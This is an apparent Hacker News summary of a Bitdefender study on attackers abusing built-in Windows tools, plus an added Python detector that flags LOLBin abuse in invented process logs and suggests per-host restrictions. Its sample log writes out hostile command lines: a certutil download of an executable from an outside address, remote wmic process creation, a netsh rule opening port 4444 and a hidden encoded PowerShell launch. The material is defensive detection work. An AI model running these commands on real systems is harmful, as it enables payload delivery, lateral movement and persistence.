The Hidden Danger of Trusted Utilities
A 45-day internal attack surface assessment by Bitdefender has revealed a stark reality for enterprise security. The most dangerous activity inside most organizations no longer looks like a traditional attack. It looks like routine IT administration. PowerShell, WMIC, netsh, and certutil, the same utilities that IT teams use every day, are also the preferred toolkit of modern threat actors. Because these are signed Microsoft binaries that ship with the operating system, signature-based controls see nothing to block. Bitdefender’s analysis of 700,000 high-severity incidents found legitimate-tool abuse in 84% of cases. A clean Windows 11 install ships with 133 unique living-off-the-land binaries (LOLBins) spread across 987 instances. PowerShell remains active on 73% of endpoints, much of it invoked silently by third-party applications rather than run interactively. This is not a malware problem. It is an over-entitlement problem: tools that every user can run but few legitimately need, and that cannot be patched away.
Impact and Scope of the Assessment
The assessment runs over roughly 45 days using Bitdefender’s GravityZone PHASR (Proactive Hardening and Attack Surface Reduction) technology. It begins with a kickoff and a behavioral learning phase that baselines which users and endpoints actually use which tools, then produces a specific, prioritized list of users, endpoints, and tools that can be safely taken away from attackers without breaking business operations. Gartner now projects that preemptive cybersecurity will account for 50% of IT security spending by 2030, up from less than 5% in 2024. The firm also predicts that 60% of large enterprises will adopt dynamic attack surface reduction technologies by 2030, up from less than 10% in 2025. The core insight is about timing. When most intrusions involve no malware and adversaries move in minutes, a detect-and-respond approach is too slow. Organizations must remove the moves attackers can make in the first place: if a user never runs certutil, an attacker operating as that user should not be able to run it either.
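The following is an added worked example, not part of the article and not Bitdefender's, PHASR's or The Hacker News' code. It puts the two ideas above into miniature: flag known abuse of certutil, WMIC, netsh and PowerShell in process-creation events (the "trusted utilities" point), then learn per host which of those tools were used legitimately and by which parent process, and list what could be restricted on each host (the "behavioral learning, then prioritized removal" point). The key=value log format, field names, hosts, users, paths and every event are constructed for the example; the abuse patterns are well-known LOLBin techniques, not Bitdefender's ruleset.

```python
"""Added example: LOLBin abuse detection plus a per-host 'safe to remove' list.
Not Bitdefender/PHASR code. Log format, hosts, users and events are constructed."""
import re
from collections import defaultdict

LOLBINS = {"powershell.exe", "wmic.exe", "netsh.exe", "certutil.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Well-known abuse patterns per binary, matched against the lower-cased command line.
RULES = [
    ("certutil.exe", re.compile(r"-urlcache|-decode"),
     "certutil used to download or decode a file"),
    ("wmic.exe", re.compile(r"process\s+call\s+create|/node:"),
     "wmic used for remote or indirect process execution"),
    ("netsh.exe", re.compile(r"portproxy|advfirewall\s+firewall\s+add"),
     "netsh used for port forwarding or firewall changes"),
    ("powershell.exe",
     re.compile(r"-enc(odedcommand)?\b|downloadstring|invoke-expression|\biex\b|-w(indowstyle)?\s+hidden"),
     "powershell launched with encoded, hidden or download-and-run arguments"),
]

# Constructed key=value process-creation events (4688-style content, invented format).
SAMPLE_LOG = r'''
host=WS01 user=CORP\alice image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\explorer.exe cmd="powershell.exe -File C:\Scripts\inventory.ps1"
host=WS01 user=CORP\alice image=C:\Windows\System32\certutil.exe parent=C:\Windows\System32\cmd.exe cmd="certutil -urlcache -split -f http://203.0.113.5/a.txt C:\Users\alice\a.exe"
host=WS02 user=CORP\bob image=C:\Windows\System32\wbem\wmic.exe parent=C:\Windows\System32\cmd.exe cmd="wmic /node:WS03 process call create cmd.exe"
host=WS02 user=CORP\svc_backup image=C:\Windows\System32\netsh.exe parent="C:\Program Files\BackupCo\agent.exe" cmd="netsh advfirewall firewall add rule name=tunnel dir=in action=allow protocol=TCP localport=4444"
host=WS03 user=CORP\carol image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" cmd="powershell -nop -w hidden -enc SQBFAFgA"
host=WS03 user=CORP\carol image=C:\Windows\System32\netsh.exe parent=C:\Windows\System32\mmc.exe cmd="netsh interface show interface"
host=WS01 user=CORP\dave image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent="C:\Program Files\Vendor\updater.exe" cmd="powershell -ExecutionPolicy Bypass -File C:\Program Files\Vendor\update.ps1"
host=WS02 user=CORP\bob image=C:\Windows\System32\notepad.exe parent=C:\Windows\explorer.exe cmd="notepad.exe notes.txt"
'''.strip().splitlines()

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value, value optionally quoted


def parse_event(line):
    """Parse one constructed key=value line into a dict with tool/parent basenames added."""
    ev = {}
    for m in _KV.finditer(line):
        ev[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    ev["tool"] = ev["image"].rsplit("\\", 1)[-1].lower()
    ev["parent_name"] = ev["parent"].rsplit("\\", 1)[-1].lower()
    return ev


def classify(ev):
    """Reasons an event looks like LOLBin abuse; an empty list means benign or not a LOLBin."""
    reasons = []
    if ev["tool"] not in LOLBINS:
        return reasons
    cmd = ev["cmd"].lower()
    for tool, pattern, why in RULES:
        if tool == ev["tool"] and pattern.search(cmd):
            reasons.append(why)
    if ev["parent_name"] in OFFICE_PARENTS:  # document-spawned shells are a classic phishing tell
        reasons.append(f"{ev['tool']} spawned by Office application {ev['parent_name']}")
    return reasons


def scan(lines):
    """Parse all lines; return (events, findings) where findings are flagged events only."""
    events = [parse_event(l) for l in lines if l.strip()]
    findings = [(ev["host"], ev["user"], ev["tool"], classify(ev)) for ev in events]
    return events, [f for f in findings if f[3]]


def learn_baseline(events):
    """Learning phase: per host, which LOLBins ran benignly and which parents launched them."""
    baseline = defaultdict(lambda: defaultdict(set))
    for ev in events:
        if ev["tool"] in LOLBINS and not classify(ev):
            baseline[ev["host"]][ev["tool"]].add(ev["parent_name"])
    return baseline


def recommend_removals(events):
    """Per host, the LOLBins nobody used legitimately in the window: candidates to restrict."""
    baseline = learn_baseline(events)
    hosts = {ev["host"] for ev in events}
    return {h: sorted(LOLBINS - set(baseline[h])) for h in sorted(hosts)}


if __name__ == "__main__":
    events, findings = scan(SAMPLE_LOG)
    for host, user, tool, reasons in findings:
        print(f"[ALERT] {host} {user} {tool}: " + "; ".join(reasons))
    for host, tools in recommend_removals(events).items():
        print(f"[HARDEN] {host}: restrict {', '.join(tools)}")
```

Note the third-party case in the sample: PowerShell launched by a vendor updater on WS01 trips no rule, so the baseline records updater.exe as a legitimate parent and PowerShell stays off WS01's removal list. That is the "without breaking business operations" constraint in code, and also the reason a learning window matters: restrict first and that updater breaks.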
Source: The Hacker News
